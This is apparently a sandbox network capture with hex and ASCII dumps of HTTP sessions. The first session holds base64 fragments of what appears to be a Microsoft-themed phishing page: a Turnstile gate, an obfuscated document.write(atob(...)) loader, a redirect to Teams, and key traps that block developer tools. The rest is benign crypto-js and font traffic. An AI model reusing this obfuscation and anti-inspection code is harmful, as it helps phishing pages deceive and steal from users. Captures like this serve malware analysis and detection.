                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 77 63 6d 39 6a 5a 58 4e 7a 5a 58 4d 67 64 47 38 67 5a 57 35 7a 64 58 4a 6c 49 47 4a 79 62 33 64 7a 5a 58 49 67 63 32 46 6d 5a 58 52 35 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30 50 67 30 4b 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e 4a 6c 62 6d 52 6c 63 69 67 6e 49 32 4e 6d 4a 79 77 67 65 77 30 4b 49 43 41 67 49 48 4e 70 64 47 56 72 5a 58 6b 36 49 43 63 77 65 44 52 42 51 55 46 42 51 55 46 42 65 6b 4a 48 64 58 6b 31 63 7a 4a 74 5a 45 56 73 51 6e 59 6e 4c 41 30 4b 49 43 41 67 49 43 64 6c 63 6e 4a 76 63 69 31 6a 59 57 78 73 59 6d 46 6a 61 79 63 36 49 45 74 70 61 6e 56 4b 5a 30 52 56 62 58 45 73 44 51
                                                                                                                                                                                                                                                                            Data Ascii: wcm9jZXNzZXMgdG8gZW5zdXJlIGJyb3dzZXIgc2FmZXR5Lg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0Pg0KdHVybnN0aWxlLnJlbmRlcignI2NmJywgew0KICAgIHNpdGVrZXk6ICcweDRBQUFBQUFBekJHdXk1czJtZEVsQnYnLA0KICAgICdlcnJvci1jYWxsYmFjayc6IEtpanVKZ0RVbXEsDQ
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 5a 58 4a 79 62 33 49 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 64 47 56 68 62 58 4d 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 63 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41
                                                                                                                                                                                                                                                                            Data Ascii: ZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiAgICAgICAgfQ0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnZXJyb3InKXsNCiAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vdGVhbXMubWljcm9zb2Z0LmNvbScpOw0KICAgICAgICB9DQogICA
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 0a 69 66 28 78 6c 6b 74 6a 54 69 75 7a 75 20 3d 3d 20 50 67 58 46 6e 48 43 46 77 77 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39
                                                                                                                                                                                                                                                                            Data Ascii: if(xlktjTiuzu == PgXFnHCFww){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 74 51 32 68 73 55 6b 64 53 62 47 31 52 49 43 35 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 42 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 35 4f 54 4a 77 65 43 6c 37 44 51 6f 6a 62 55 4e 6f 62 46 4a 48 55
                                                                                                                                                                                                                                                                            Data Ascii: d1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNtQ2hsUkdSbG1RIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQojbUNobFJHU
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 59 33 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d
                                                                                                                                                                                                                                                                            Data Ascii: udC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldm


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            5192.168.2.44974723.218.208.109443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=65198
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:46 GMT
                                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            6192.168.2.449750104.17.24.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:47 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:48 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                            Age: 447105
                                                                                                                                                                                                                                                                            Expires: Sun, 23 Nov 2025 17:58:48 GMT
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCnDhFNQ9uRlaSboIxMI0kBruQWusRcdZBEHSfZMqRnbcVu9MQSOlxQt1QrepqOI6iae1kcVyQjUSFoxbM4fi1tCFVGwGsV0JSM%2BW%2BL11tqaKT%2Fvx7Wox7K%2B9Z3cFWoQOxxjDl%2Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57265cde67289-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                                            Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                            Data Ascii: peof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79
                                                                                                                                                                                                                                                                            Data Ascii: ne.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBy
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b
                                                                                                                                                                                                                                                                            Data Ascii: =typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d
                                                                                                                                                                                                                                                                            Data Ascii: or(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c
                                                                                                                                                                                                                                                                            Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                                                                                                                                                                                                                                            Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                                                                                                                                                                                                                                            Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                                                                                                                                                                                                                                            Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
